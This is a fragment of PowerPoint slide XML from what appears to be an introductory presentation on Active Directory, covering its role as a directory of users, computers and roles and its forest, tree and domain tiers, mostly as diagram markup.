            <a:off x="2819386" y="3603900"/>
            <a:ext cx="5977058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5400" ker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Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Google Shape;165;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927691D9-2DA4-3D45-E7D3-B7FC18C60912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3103061" y="3167954"/>
            <a:ext cx="5409708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2821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5CCB2A2-8181-4247-CE39-8532CFAB8B7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243177" y="232972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Active Directory (AD)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C3B909E9-A18A-575A-A250-2D2E435B46C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448754" y="1579348"/>
            <a:ext cx="9294491" cy="369930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94267" marR="3387" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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32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Databases or set of services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="694267" marR="3387" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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32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Users, computers, roles, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="694267" marR="3387" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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32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Simplify security configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="694267" marR="3387" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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32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3 tiers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1151467" marR="3387" lvl="1" indent="-685800"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FOREST – highest level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1151467" marR="3387" lvl="1" indent="-685800"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TREE – collection of domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1151467" marR="3387" lvl="1" indent="-685800">
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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DOMAIN – collection of objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3494651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FB921C9-8778-95CF-06C0-9F1BA62FC788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1912363" y="-13595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FOREST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E22AD5-ACAF-4E7C-1252-BA667685252F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1746471" y="4024897"/>
            <a:ext cx="4287607" cy="2453410"/>
            <a:chOff x="595770" y="930742"/>
            <a:chExt cx="10486455" cy="51920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6E7988-1D80-8336-3463-B4309F66C6AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6214308" y="2636000"/>
              <a:ext cx="4867917" cy="3486803"/>
              <a:chOff x="1362075" y="627997"/>
              <a:chExt cx="9548701" cy="544404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D9E99A1-96B0-DCD4-91F8-BD3E68164A22}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1362075" y="627997"/>
                <a:ext cx="9548701" cy="5444047"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 17828"/>
                </a:avLst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User with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F362E5A0-09AA-7BC4-BDBA-33293CD4F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08051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12" name="Graphic 11" descr="User with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496CB419-9A00-E4F5-3E90-7B65A9885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3150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13" name="Graphic 12" descr="Computer with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C6E1F1-5892-9915-EE38-B591876E8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27217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15" name="Graphic 14" descr="Server with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D2C412-0AED-5DE0-A3D9-9F64AFDC6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79718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16" name="Graphic 15" descr="Computer with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77DF44EF-3648-20C5-43E0-E317F7E40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33124" y="2694309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17" name="Graphic 16" descr="User with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDD6FA68-DB05-D815-2396-153A8D5D2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21800" y="2670259"/>
                <a:ext cx="1230200" cy="1230200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11EF3CB-A8A8-51BB-BE7F-68AD800B4E2A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4898985" y="785956"/>
                <a:ext cx="2480204" cy="1351068"/>
                <a:chOff x="5076713" y="972294"/>
                <a:chExt cx="1899629" cy="1137002"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="25" name="Graphic 24" descr="Database with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0616A56D-C784-C0F6-AE53-449985314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6713" y="118553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6" name="Graphic 25" descr="Database with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D660871-9241-9D27-8EF7-104CDEE53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0209" y="9722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7" name="Graphic 26" descr="Database with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2023835-8939-B999-3149-17A9FD0D09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1942" y="1194896"/>
                  <a:ext cx="914400" cy="914400"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic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7108505-F575-6DAE-5F67-1EBE6E945FEC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="26" idx="2"/>
                <a:endCxn id="17" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="4536900" y="1872512"/>
                <a:ext cx="1616394" cy="79774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8B2292E-A96B-A739-D6D8-B8E4C4106058}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="26" idx="2"/>
                <a:endCxn id="16" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6153294" y="1872512"/>
                <a:ext cx="94930" cy="82179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4F061E0-B78D-0A8D-721A-C4D80180909C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="26" idx="2"/>
                <a:endCxn id="15" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6153294" y="1872512"/>
                <a:ext cx="3041524" cy="26226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51232A4-9789-6593-3EAC-C5ED07BC58D9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="17" idx="2"/>
                <a:endCxn id="12" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="2958250" y="3900459"/>
                <a:ext cx="1578650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C42C2B8-EFD1-1B3E-F938-174CF4C999F2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="17" idx="2"/>
                <a:endCxn id="9" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="4523151" y="3900459"/>
                <a:ext cx="13749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2E771A5-48DC-3DF4-EAC0-D14B57EB8AAD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="17" idx="2"/>
                <a:endCxn id="13" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4536900" y="3900459"/>
                <a:ext cx="1805417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DB5EB0-C00F-F2B4-BC56-242867B49FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="595770" y="1825964"/>
              <a:ext cx="4814435" cy="3486803"/>
              <a:chOff x="1362075" y="587384"/>
              <a:chExt cx="9548701" cy="5444047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0A2BAA71-1DA7-0D22-9360-B3C8D9179B10}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1362075" y="587384"/>
                <a:ext cx="9548701" cy="5444047"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 17828"/>
                </a:avLst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Graphic 29" descr="User with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{310107B2-BE6F-E070-B5F9-F2FB9E297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08051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31" name="Graphic 30" descr="User with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E27A627-F76C-E743-6120-6DC745A64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3150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32" name="Graphic 31" descr="Computer with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D311C87-3B5D-FAC2-F4C4-B28D08961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27217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33" name="Graphic 32" descr="Server with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF3ED8CC-7E9B-03E1-A9A1-A5B92601B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79718" y="4495152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34" name="Graphic 33" descr="Computer with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5661F86F-25D5-A544-F9F3-48E4C5C57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33124" y="2694309"/>
                <a:ext cx="1230200" cy="1230200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Graphic 34" descr="User with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4734C58-699C-78AB-7CD1-C99BA4814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21800" y="2670259"/>
                <a:ext cx="1230200" cy="1230200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060826B-0E6A-96EA-2D41-98BF11ADE26D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4898985" y="785956"/>
                <a:ext cx="2480204" cy="1351068"/>
                <a:chOff x="5076713" y="972294"/>
                <a:chExt cx="1899629" cy="1137002"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="43" name="Graphic 42" descr="Database with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B3682D-02E5-2B8D-8ED7-9588B82A9C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6713" y="118553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4" name="Graphic 43" descr="Database with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B22894FC-89EC-4C39-F218-4155CFD81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0209" y="9722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5" name="Graphic 44" descr="Database with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C21C4073-49C8-274F-A831-490F87A3B7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1942" y="1194896"/>
                  <a:ext cx="914400" cy="914400"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic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CE0ADC7-ADB2-DEB2-3C7D-5FB11A71709B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="44" idx="2"/>
                <a:endCxn id="35" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="4536900" y="1872512"/>
                <a:ext cx="1616394" cy="79774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056A73C-82DD-5101-7801-39A7F6B8B5A6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="44" idx="2"/>
                <a:endCxn id="34" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6153294" y="1872512"/>
                <a:ext cx="94930" cy="82179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E70552A-1F78-562C-0AF0-8089CDB36B57}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="44" idx="2"/>
                <a:endCxn id="33" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6153294" y="1872512"/>
                <a:ext cx="3041524" cy="26226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20711D-32E1-17EC-38BA-4B03BFE99320}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="35" idx="2"/>
                <a:endCxn id="31" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="2958250" y="3900459"/>
                <a:ext cx="1578650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840C16A-6C40-C55B-C6D8-A55E7DAEAFD1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="35" idx="2"/>
                <a:endCxn id="30" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="4523151" y="3900459"/>
                <a:ext cx="13749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BDDBBA-7D8A-738D-BCB0-8CD321362790}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="35" idx="2"/>
                <a:endCxn id="32" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4536900" y="3900459"/>
                <a:ext cx="1805417" cy="5946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4DC58C6-A287-7285-37BD-35CFD3F32B6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="50" idx="2"/>
              <a:endCxn id="29" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3002989" y="930742"/>
              <a:ext cx="3448276" cy="895222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97E232-D736-68D5-7835-9CDA293689C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2943226" y="1983560"/>
            <a:ext cx="2394774" cy="2041337"/>
            <a:chOff x="1362075" y="627997"/>
            <a:chExt cx="9548701" cy="544404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207455D-867C-1A46-2B5D-56C571D07FBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1362075" y="627997"/>
              <a:ext cx="9548701" cy="5444047"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1782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User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8757F0B9-6E37-3F35-7798-7BCA404F9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8051" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="Graphic 51" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A53998E1-0374-42B9-06D4-B76AE5DA0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3150" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="Graphic 52" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A681FD01-C1C7-3EDB-A656-4CEB214F4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7217" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="Graphic 53" descr="Server with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B239E4D-9B23-741C-CF7F-6D94C9216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9718" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="Graphic 54" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61CDE3F7-251F-032C-B0C3-11331243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3124" y="2694309"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="Graphic 55" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B9BBDC-979B-566F-A6DE-8D4CACA02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800" y="2670259"/>
              <a:ext cx="1230200" cy="1230200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BE9EFB2-C348-37EB-C8BE-EEA648342B10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4898985" y="785956"/>
              <a:ext cx="2480204" cy="1351068"/>
              <a:chOff x="5076713" y="972294"/>
              <a:chExt cx="1899629" cy="1137002"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="64" name="Graphic 63" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B101FC33-50F1-5991-6588-AA55729A5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76713" y="11855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5" name="Graphic 64" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A6EC29-2A9F-9667-132D-118B14223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80209" y="9722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6" name="Graphic 65" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80057156-D49A-2544-D87E-23714D832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61942" y="1194896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249E85-4DEB-DA7C-66D0-F67B9CC53046}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="65" idx="2"/>
              <a:endCxn id="56" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4536900" y="1872512"/>
              <a:ext cx="1616394" cy="79774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AF293AE-138A-29C6-49AE-354FE95976A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="65" idx="2"/>
              <a:endCxn id="55" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="94930" cy="82179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2BB6731-139F-BFCF-9AD0-33BBE25D68E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="65" idx="2"/>
              <a:endCxn id="54" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="3041524" cy="26226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26D9014-479B-CCA1-A5F9-A95E84982BE2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="56" idx="2"/>
              <a:endCxn id="52" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2958250" y="3900459"/>
              <a:ext cx="1578650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ED0B0A-DDB9-E8B2-4DC2-AA41A0851FA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="56" idx="2"/>
              <a:endCxn id="51" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4523151" y="3900459"/>
              <a:ext cx="13749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09973A7-2788-68E7-C5A9-9AD2A2BE6025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="56" idx="2"/>
              <a:endCxn id="53" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4536900" y="3900459"/>
              <a:ext cx="1805417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2B9DDB5-A5AF-C93B-433C-F3F36FE70483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="50" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4140613" y="4024897"/>
            <a:ext cx="898290" cy="80578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09D69F-0EB7-CB0F-43D5-31D27940C0B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7079027" y="1830579"/>
            <a:ext cx="2394774" cy="2041337"/>
            <a:chOff x="1362075" y="627997"/>
            <a:chExt cx="9548701" cy="544404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E92BC9F-9DA6-98FB-EF15-0C2DE5840361}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1362075" y="627997"/>
              <a:ext cx="9548701" cy="5444047"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1782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Graphic 78" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978FD869-E398-F3A4-0576-A97B5DCC5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8051" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="80" name="Graphic 79" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB29B13B-C261-5D87-9122-D4529AF64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3150" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="81" name="Graphic 80" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8BFDB71-8AEF-1177-E1D9-6703390CF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7217" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="82" name="Graphic 81" descr="Server with solid fill">
              <a:extLst>
